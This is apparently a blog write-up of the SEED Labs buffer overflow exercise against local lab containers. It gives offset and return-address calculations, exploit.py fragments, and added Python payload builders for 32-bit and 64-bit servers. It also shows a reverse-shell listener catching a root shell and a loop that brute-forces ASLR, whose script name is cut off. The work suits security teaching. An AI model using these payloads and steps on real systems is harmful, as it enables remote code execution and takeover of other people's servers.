Overflow Attack

Updated: 2023-03-27 10:31:18


Published 2023-03-27 (author: 广州机动车)

SEED Lab (2): Buffer Overflow Attack

1. How the vulnerability works

Vulnerable code example:

    #include <string.h>

    void foo(char *str)
    {
        char buffer[12];
        strcpy(buffer, str);   /* no length check: a str longer than 12 bytes overflows buffer */
    }

    int main()
    {
        char *str = "This is definitely longer than 12";
        foo(str);
        return 1;
    }

When str is copied into buffer, str is longer than 12 bytes, so buffer overflows: the excess bytes of str are written above the buffer, over the saved frame pointer and the return address of foo(). The goal is to plant code there and make the function's return address point to the address A where our code sits, so that the code runs when foo() returns.

A: the start address of the code

NOP: opcode 0x90; it does nothing and execution simply continues with the next instruction. Filling the bytes between the return-address slot and the code with NOPs makes A easy to hit: as long as the overwritten return address points at any one of the NOPs, execution slides down the sled to the code at A.

2. Lab setup

Go to the /Buffer_Overflow/Labsetup/server-code directory and run:

$ make

$ make install

$ cd ..   # back to /Labsetup

$ dcbuild   # SEED alias for docker-compose build

$ dcup      # SEED alias for docker-compose up

Turn off the countermeasure: memory randomization (ASLR)

$ sudo /sbin/sysctl -w kernel.randomize_va_space=0

1 Attack: Get the Parameters

$ echo hello | nc 10.9.0.5 9090

^C

If two runs print the same addresses and they are of the form 0xffffxxxx, memory randomization has been turned off;

Container Console

server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====

$ cd /Buffer_Overflow/Files

$

Then use ebp and the buffer address to compute A (ret) and offset:

ret (A) = 0xffffd108 + 8   (A may be anywhere from ebp + 8, the first NOP after the return-address slot, up to the start of the shellcode at buffer + 517 - len(code))

offset = 0xffffd108 - 0xffffd098 + 4 = 116 (decimal); the saved return address sits 4 bytes above the saved ebp, so offset is the distance from the buffer start to that slot

Change the ret and offset values in the file, save and exit; then run:

$

$ cat badfile | nc 10.9.0.5 9090

Container Console

server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 517
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd428
server-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd3b8
server-1-10.9.0.5 | (^_^) SUCCESS SUCCESS (^_^)

If '(^_^) SUCCESS SUCCESS (^_^)' appears as above, the attack succeeded.

Get Reverse Shell

Change the ret and offset values in the file:

### Put the shellcode at the end
content[517 - len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd428 + 40

# You need to calculate the offset
offset = 116

L = 4  # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')

## Open a new terminal window and run `$ nc -lnv 7070` to start listening

In another window, send the badfile to the server:

$

$ cat badfile | nc 10.9.0.5 9090

When the listening window shows the following, the reverse shell was obtained:

Listening on 0.0.0.0 7070

Connection received on 10.9.0.5 51582

root@ec5152748270:/bof#

2 Attack: Buffer Size Unknown

$ echo hello | nc 10.9.0.6 9090

^C

Container Console

server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 6
server-2-10.9.0.6 | Buffer's address inside bof(): 0xffffd368
server-2-10.9.0.6 | ==== Returned Properly ====

Change the ret and S values in the file:

S: the number of copies of the return address to spray = buffer size / 4 (each copy is 4 bytes). This server does not print ebp, so the buffer size, and with it the offset of the return address, is unknown; instead every 4-byte word from the start of the buffer is filled with ret, so that whichever word holds the saved return address is overwritten.

ret: buffer address + buffer size. Since the size is unknown, use its upper bound: the spray must extend past the highest possible position of the return address, and ret must point past the spray into the NOP sled, but before the shellcode at the end.

### Put the shellcode at the end of the buffer
content[517 - len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd368 + 360

# Spray the buffer with S number of return address
# You need to decide the S value
S = 90

for offset in range(S):
    content[offset * 4:offset * 4 + 4] = (ret).to_bytes(4, byteorder='little')

## $

$ cat badfile | nc 10.9.0.6 9090

Container Console

server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 517
server-2-10.9.0.6 | Buffer's address inside bof(): 0xffffd368
server-2-10.9.0.6 | (^_^) SUCCESS SUCCESS (^_^)
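To see why the spray works without knowing the buffer size, here is a small added example in Python (it is not the lab's exploit.py and not the page author's code). It builds the Level 2 payload with the values used above (ret = buffer + 360, S = 90) and then checks, for every buffer size the server might have, that the word holding the saved return address is covered by the spray and that ret lands on the NOP sled in front of the shellcode. The assumed size range of 100 to 300 bytes, the allowance of up to 12 bytes of compiler padding, and the 0xCC placeholder shellcode are assumptions made for the demonstration, not values taken from the page.

```python
# Added example (not the lab's exploit.py): build the Level 2 "spray" payload
# and check that it works for every buffer size the server might have.
# SHELLCODE is a constructed placeholder; real shellcode must contain no NUL bytes.

NOP = 0x90
TOTAL = 517        # the server reads at most 517 bytes of input
WORD = 4           # 32-bit server: saved ebp and return address are 4 bytes each

SHELLCODE = bytes([0xCC] * 60)   # placeholder, not real shellcode


def build_spray_payload(ret: int, spray_count: int, shellcode: bytes = SHELLCODE) -> bytes:
    """Level 2 layout: spray_count copies of ret from the start of the buffer,
    then a NOP sled, then the shellcode at the very end of the 517 bytes."""
    content = bytearray([NOP] * TOTAL)
    content[TOTAL - len(shellcode):] = shellcode
    ret_bytes = ret.to_bytes(WORD, "little")
    for i in range(spray_count):
        content[i * WORD:(i + 1) * WORD] = ret_bytes
    return bytes(content)


def candidate_return_slots(min_size: int, max_size: int, max_padding: int) -> list:
    """Offsets (from the buffer start) at which the saved return address may sit:
    buffer size + compiler padding below the saved ebp + one word for the saved
    ebp itself. Only word-aligned offsets are kept, since stack slots are aligned."""
    slots = set()
    for size in range(min_size, max_size + 1):
        for pad in range(max_padding + 1):
            off = size + pad + WORD
            if off % WORD == 0:
                slots.add(off)
    return sorted(slots)


def spray_problems(payload: bytes, buf_addr: int, ret: int, slots: list,
                   shellcode_len: int = len(SHELLCODE)) -> list:
    """Return the reasons this payload would fail; an empty list means it looks good."""
    problems = []
    copied = payload.split(b"\x00", 1)[0]      # strcpy() stops at the first NUL byte
    if len(copied) < TOTAL:
        problems.append("payload contains a NUL byte; strcpy() truncates it")
    ret_bytes = ret.to_bytes(WORD, "little")
    missed = [o for o in slots if copied[o:o + WORD] != ret_bytes]
    if missed:
        problems.append(f"{len(missed)} possible return-address slots not sprayed (first: {missed[0]})")
    shellcode_start = TOTAL - shellcode_len
    landing = ret - buf_addr                    # where execution resumes, as a buffer offset
    if not 0 <= landing <= shellcode_start:
        problems.append("ret does not point into the buffer in front of the shellcode")
    elif any(b != NOP for b in payload[landing:shellcode_start]):
        problems.append("ret lands on the sprayed addresses instead of the NOP sled")
    return problems


if __name__ == "__main__":
    buf = 0xffffd368                           # address printed by server-2 above
    ret = buf + 360
    payload = build_spray_payload(ret, 90)
    slots = candidate_return_slots(100, 300, 12)   # assumed size range and padding
    print("problems:", spray_problems(payload, buf, ret, slots) or "none")
    with open("badfile", "wb") as f:
        f.write(payload)
```

Running the checker on a spray that is too short (S = 40) or on a ret that points inside the spray (buffer + 200) reports the problem, which is what you want to know before sending 517 bytes at a live server.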

3 Attack: 64-bit Server

Principle: on x86-64 the stack addresses the server prints look like 0x00007fffffffe2d0, so the two most significant bytes of any return address are zero. Because strcpy() stops copying at the first zero byte, nothing placed after the return-address slot in badfile reaches the stack; the shellcode must therefore be placed before that slot, near the start of the buffer, with the return address pointing into the NOP sled in front of it. The zero high bytes of the address itself do not need to be copied, because the saved return address already has zero high bytes.

$ echo hello | nc 10.9.0.7 9090

^C

Container Console

server-3-10.9.0.7 | Got a connection from 10.9.0.1
server-3-10.9.0.7 | Starting stack
server-3-10.9.0.7 | Input size: 517
server-3-10.9.0.7 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2d0
server-3-10.9.0.7 | Buffer's address inside bof(): 0x00007fffffffe200

Change start, ret and offset in the file:

start = 40   (offset of the shellcode inside badfile, i.e. the shellcode goes at the front)

offset = rbp - buffer + 8   (the return address sits 8 bytes above the saved rbp on 64-bit; here 0xd0 + 8 = 216)

ret = any address in the range [buffer, buffer + 40] (the NOP sled in front of the shellcode). Avoid a value whose lowest byte is 0x00, such as the buffer address 0x...e200 itself: strcpy() would stop at that byte and the return address would not be written.

$

$ cat badfile | nc 10.9.0.7 9090

Container Console

server-3-10.9.0.7 | Got a connection from 10.9.0.1
server-3-10.9.0.7 | Starting stack
server-3-10.9.0.7 | Input size: 517
server-3-10.9.0.7 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2d0
server-3-10.9.0.7 | Buffer's address inside bof(): 0x00007fffffffe200
server-3-10.9.0.7 | (^_^) SUCCESS SUCCESS (^_^)
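Pulling Levels 1 and 3 together, the following added example (Python, not the lab's exploit.py and not the page author's code) computes offset and ret from the frame pointer and buffer address the server prints, builds the 517-byte badfile, and then simulates what strcpy() actually copies. It shows the two layouts side by side: shellcode at the end with ret just past the return-address slot for the 32-bit server, and shellcode at the front with ret in the sled before it for the 64-bit server, where the zero bytes of the address stop the copy (including a ret whose lowest byte is zero, which the check flags). The 0xCC placeholder shellcode is constructed for the demonstration; the addresses are the ones printed by server-1 and server-3 above.

```python
# Added example (not the lab's exploit.py): compute offset and ret from the two
# addresses the server prints, build badfile, and check it against strcpy()'s
# behaviour for both the 32-bit (Level 1) and 64-bit (Level 3) servers.
# SHELLCODE is a constructed placeholder; real shellcode must contain no NUL bytes.

NOP = 0x90
TOTAL = 517                       # the server reads at most 517 bytes of input
SHELLCODE = bytes([0xCC] * 60)    # placeholder, not real shellcode


def return_address_offset(frame_ptr: int, buf_addr: int, word: int) -> int:
    """Offset of the saved return address from the start of the buffer: the saved
    frame pointer is at frame_ptr, the return address one word above it
    (ebp + 4 on 32-bit, rbp + 8 on 64-bit)."""
    return frame_ptr - buf_addr + word


def build_payload(frame_ptr: int, buf_addr: int, word: int = 4,
                  shellcode: bytes = SHELLCODE, shellcode_start=None, ret=None):
    """Return (payload, offset, ret).

    shellcode_start=None puts the shellcode at the end of badfile (Level 1 layout)
    and aims ret at the NOP sled just past the return-address slot. A small
    shellcode_start puts it at the front of the buffer (Level 3 layout, needed on
    64-bit where the address contains zero bytes) and aims ret at the middle of
    the NOP sled in front of the shellcode."""
    offset = return_address_offset(frame_ptr, buf_addr, word)
    if shellcode_start is None:
        shellcode_start = TOTAL - len(shellcode)
    if ret is None:
        if shellcode_start > offset:
            ret = frame_ptr + 2 * word             # first NOP after the slot
        else:
            ret = buf_addr + shellcode_start // 2  # middle of the sled in front
    content = bytearray([NOP] * TOTAL)
    content[shellcode_start:shellcode_start + len(shellcode)] = shellcode
    content[offset:offset + word] = ret.to_bytes(word, "little")
    return bytes(content), offset, ret


def payload_problems(payload: bytes, buf_addr: int, offset: int, ret: int,
                     word: int, shellcode_start: int, shellcode_len: int) -> list:
    """Checks to run before sending badfile; an empty list means it looks good."""
    problems = []
    copied = payload.split(b"\x00", 1)[0]     # strcpy() stops at the first NUL byte
    n = len(copied)
    if shellcode_start + shellcode_len > n:
        problems.append("shellcode lies past the first NUL byte and is never copied")
    if shellcode_start < offset + word and shellcode_start + shellcode_len > offset:
        problems.append("shellcode overlaps the return-address slot")
    ret_bytes = ret.to_bytes(word, "little")
    # The zero high bytes of a 64-bit address need not be copied (the saved return
    # address already has them), but every non-zero byte must land on the stack.
    last_nonzero = max((i for i, b in enumerate(ret_bytes) if b), default=0)
    if offset + last_nonzero >= n:
        problems.append("return address is truncated by strcpy()")
    landing = ret - buf_addr                   # where execution resumes, as a buffer offset
    if not 0 <= landing < n:
        problems.append("ret does not point into the copied part of the buffer")
    elif offset <= landing < offset + word:
        problems.append("ret lands on the return-address slot itself")
    elif landing > shellcode_start or any(b != NOP for b in payload[landing:shellcode_start]):
        problems.append("bytes between ret and the shellcode are not all NOPs")
    return problems


if __name__ == "__main__":
    # server-1 (32-bit): shellcode at the end, ret just past the return address
    payload, offset, ret = build_payload(0xffffd108, 0xffffd098)
    print(f"32-bit: offset={offset} ret={ret:#x} "
          f"problems={payload_problems(payload, 0xffffd098, offset, ret, 4, 457, 60) or 'none'}")
    # server-3 (64-bit): shellcode at offset 40, ret in the sled in front of it
    payload, offset, ret = build_payload(0x7fffffffe2d0, 0x7fffffffe200, word=8, shellcode_start=40)
    print(f"64-bit: offset={offset} ret={ret:#x} "
          f"problems={payload_problems(payload, 0x7fffffffe200, offset, ret, 8, 40, 60) or 'none'}")
    with open("badfile", "wb") as f:
        f.write(payload)
```

Trying the Level 1 layout against the 64-bit addresses shows both failure modes at once: the shellcode at the end is never copied, and ret = rbp + 16 points past the truncated copy. Choosing ret = buffer exactly on server-3 is caught by the truncation check, because 0x...e200 has a zero low byte.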

4 Attack: Small Buffer (64-bit)

$ echo hello | nc 10.9.0.8 9090

^C

Container Console

server-4-10.9.0.8 | Got a connection from 10.9.0.1
server-4-10.9.0.8 | Starting stack
server-4-10.9.0.8 | Input size: 6
server-4-10.9.0.8 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2b0
server-4-10.9.0.8 | Buffer's address inside bof(): 0x00007fffffffe250
server-4-10.9.0.8 | ==== Returned Properly ====

Modify the file. Here the buffer in bof() is too small to hold the shellcode, but the complete 517-byte input is still sitting in a buffer higher up the stack (the one the server read it into before calling bof()), so the return address is pointed there instead:

ret = rbp + 1200

$

$ cat badfile | nc 10.9.0.8 9090

Container Console

server-4-10.9.0.8 | Got a connection from 10.9.0.1
server-4-10.9.0.8 | Starting stack
server-4-10.9.0.8 | Input size: 517
server-4-10.9.0.8 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2b0
server-4-10.9.0.8 | Buffer's address inside bof(): 0x00007fffffffe250
server-4-10.9.0.8 | (^_^) SUCCESS SUCCESS (^_^)

Turn the countermeasure back on

$ sudo /sbin/sysctl -w kernel.randomize_va_space=2

Run `$ nc -lnv 7070` to start listening

Listening on 0.0.0.0 7070

Change the exploit to the reverse shell version, then brute-force the randomized stack address: the same badfile is sent over and over until the guessed address happens to be right. This is feasible here because 32-bit Linux randomizes the stack base over only a small number of bits, and the server keeps accepting connections after each failed attempt.

Open a new terminal window:

$

$ chmod u+

$ ./

It took 8 minutes 12 seconds in total in my run:

8 minutes and 12 seconds elapsed.

The program has been running 27296 times so far.

8 minutes and 12 seconds elapsed.

The program has been running 27297 times so far.

Once it succeeds, the listening window gets a shell:

Connection received on 10.9.0.5 51372

root@ec5152748270:/bof#


Source: https://www.wtabcd.cn/zhishi/a/1679884278154989.html
